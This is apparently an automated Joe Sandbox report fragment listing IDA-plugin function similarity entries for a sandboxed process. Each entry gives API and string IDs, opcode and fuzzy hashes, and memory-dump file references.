                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                  • API String ID: 1001908780-3542721600
                  • Opcode ID: 17379c9ec2d1977a3446e4f38aa0a4f923461d09dfbdf32103ca3b21a0116e48
                  • Instruction ID: e87d908183b33602ba5458a147f998e3459e482af97abc1a99ab718f2bfd06d3
                  • Opcode Fuzzy Hash: 17379c9ec2d1977a3446e4f38aa0a4f923461d09dfbdf32103ca3b21a0116e48
                  • Instruction Fuzzy Hash: B5E01252A0DA0781E712DF47FC5007D2219EB907B5F4441BAED0E426B4EE6CE689D341
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                  • API String ID: 1001908780-3542721600
                  • Opcode ID: 6a0d8b9ed9287526be8abbf0c68c7214be50e319585fd108f03d42c9fc5ed7c7
                  • Instruction ID: 958463a27e5e79baf1bca6b88ad5b0e17fd9f842eaed5f62206cf0388fe0662f
                  • Opcode Fuzzy Hash: 6a0d8b9ed9287526be8abbf0c68c7214be50e319585fd108f03d42c9fc5ed7c7
                  • Instruction Fuzzy Hash: 7DE01252A0DA0781E752DF47FC5007D2219EB907B5F4441B9ED4E425B4EE6CE589D301
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                  • API String ID: 1001908780-3542721600
                  • Opcode ID: bdeea140171cc1683a9796964e62ff2d2451a16de524e313f8a0b9253efc434b
                  • Instruction ID: 012c1d9cf68d18294d8fddc0590073a812bb505f38a3e548b48049a308e8784f
                  • Opcode Fuzzy Hash: bdeea140171cc1683a9796964e62ff2d2451a16de524e313f8a0b9253efc434b
                  • Instruction Fuzzy Hash: 8EE01252B0DA0781E712DF47FC5007D2219EB907B5F4441B9ED0E426B5EE6CE589D341
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                  • API String ID: 1001908780-3542721600
                  • Opcode ID: 122e7ddee3e30f27d7bbd792767aa514d44f9f1e5c631c934f3cb3b63c8a4c98
                  • Instruction ID: 188e56a49200b0c2e5d49f83da2741e2905cfb74c5d2b21e699d00328f62b6fb
                  • Opcode Fuzzy Hash: 122e7ddee3e30f27d7bbd792767aa514d44f9f1e5c631c934f3cb3b63c8a4c98
                  • Instruction Fuzzy Hash: 66E01252A0D90781E7129F47FC5017D2219EB907B5F4441B9ED0E425B4EE6CE589D341
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                  • API String ID: 1001908780-1337547089
                  • Opcode ID: 5778dff27633abf6f9284b199295b57fd04a20718f86632072b5cffc28846bd8
                  • Instruction ID: 1c98f93c2bcceaaeb6bfb9c65556652ea8c33b9af37538bb170d7507bcb3aa5b
                  • Opcode Fuzzy Hash: 5778dff27633abf6f9284b199295b57fd04a20718f86632072b5cffc28846bd8
                  • Instruction Fuzzy Hash: 24E04851A1C70AC5F5127B40FC50279E254FF507C4FF440BADD5DC26509D7CE985D220
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                  • API String ID: 1001908780-1337547089
                  • Opcode ID: bcc82eacaf5ef66631614ae4d43a03e15e5a4950d8e37c4cfe0e681e030e1b2c
                  • Instruction ID: 27ec2f401d7ce9a15256c85afd3de31fb77592ea2b93b36c8b7a975914986076
                  • Opcode Fuzzy Hash: bcc82eacaf5ef66631614ae4d43a03e15e5a4950d8e37c4cfe0e681e030e1b2c
                  • Instruction Fuzzy Hash: E4E04855A1C70AC5F5127B00FC50279E258FF507C4FF440BADD5DC26509D7CE985D221
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                  • API String ID: 1001908780-1337547089
                  • Opcode ID: 1b16ee5e167bf403b5bbe7c1ae002ea326f743cd9f9f8840ab329073f20d483e
                  • Instruction ID: da0636a284e8db5b5b6124514817ad78fc61cd2601899213dcea0af50eead812
                  • Opcode Fuzzy Hash: 1b16ee5e167bf403b5bbe7c1ae002ea326f743cd9f9f8840ab329073f20d483e
                  • Instruction Fuzzy Hash: C3E01251A1C70AC5F5127B00FC50379A254FB507C4FF440B9D95DC25909D7CE989D220
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                  • API String ID: 1001908780-1337547089
                  • Opcode ID: 6f147ffb47e58c4c8088de614b81800e083976b52401e58c0180332c14c091b8
                  • Instruction ID: f9a881d54e7f5c1bcb31b0d95f0882adaa7da0bf2ee967acb54b21c0f253be5a
                  • Opcode Fuzzy Hash: 6f147ffb47e58c4c8088de614b81800e083976b52401e58c0180332c14c091b8
                  • Instruction Fuzzy Hash: 11E04851A1C70AC5F5127B00FC50279E254FF507C5FF441B9DD5DC2651AD7CE985D220
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                  • API String ID: 1001908780-1337547089
                  • Opcode ID: 030c4325d880301d5f66904240bf79bf9503e9000fc6bd3554b7fddc451794d3
                  • Instruction ID: b4c2c810f806d5b1045ac482f3aeabf12baf9e8a573de92e24e66878a52b1b1d
                  • Opcode Fuzzy Hash: 030c4325d880301d5f66904240bf79bf9503e9000fc6bd3554b7fddc451794d3
                  • Instruction Fuzzy Hash: A0E01265A1C70AC5F6527B00EC50279A254FB507C4FF441B9D99EC26509D7CE989D220
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                  • API String ID: 1001908780-1337547089
                  • Opcode ID: 8f1c3e1c36fa75ca42752ecfa09943136c116bdf83bda5ef7bdc699ee0ec67d8
                  • Instruction ID: 712c5a07da8640bf950af00492985e83cdf17f4e299f378209c8db8fb2445be0
                  • Opcode Fuzzy Hash: 8f1c3e1c36fa75ca42752ecfa09943136c116bdf83bda5ef7bdc699ee0ec67d8
                  • Instruction Fuzzy Hash: 1DE01A62E4CE0781E721AB97FC405BD621CBB907A4F4441B9DE4E466B0DEACEA899241
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                  • API String ID: 1001908780-1337547089
                  • Opcode ID: cb5364c729a6b89dcd3c1e2df89601c7058d45c0027886060e1f100c81987347
                  • Instruction ID: 3964f7d3d96947b8cfe745c941ccb9ea849faa4e96dfe11bc96828766e930b0e
                  • Opcode Fuzzy Hash: cb5364c729a6b89dcd3c1e2df89601c7058d45c0027886060e1f100c81987347
                  • Instruction Fuzzy Hash: 0FE09252E0CE0780E7119B47F80007D221CBB407A4F4401B9DE0E46670DE6CE984D241
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                  • API String ID: 1001908780-1337547089
                  • Opcode ID: bb2cdb2239e83db86e86385e393c09a4b8ba2f7024d00de8e2ddd93209775e27
                  • Instruction ID: 82db621a8bf1dc5ed714e643c9bc18fa1fbfc6bd033d368686b3cf9421f69187
                  • Opcode Fuzzy Hash: bb2cdb2239e83db86e86385e393c09a4b8ba2f7024d00de8e2ddd93209775e27
                  • Instruction Fuzzy Hash: 59E01252E4CE0781E7119B57FC4047D621CFB507A4F4441B9DE4E46670DE6CEA85D241
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                  • API String ID: 1001908780-1337547089
                  • Opcode ID: 1a4c5cadb1a304fe19f32a0f991ee47209cd076bb84ff34595cdc3e7ee679b21
                  • Instruction ID: b11ac48379e958cd5ce9ae7e093e5fe10037bef7f4b0d4bd4c721b2ccb2f3031
                  • Opcode Fuzzy Hash: 1a4c5cadb1a304fe19f32a0f991ee47209cd076bb84ff34595cdc3e7ee679b21
                  • Instruction Fuzzy Hash: 8EE09252E0CE0781E7119B87F80007D621CBB407A4F4400B9DE0E46670DE6CE984D241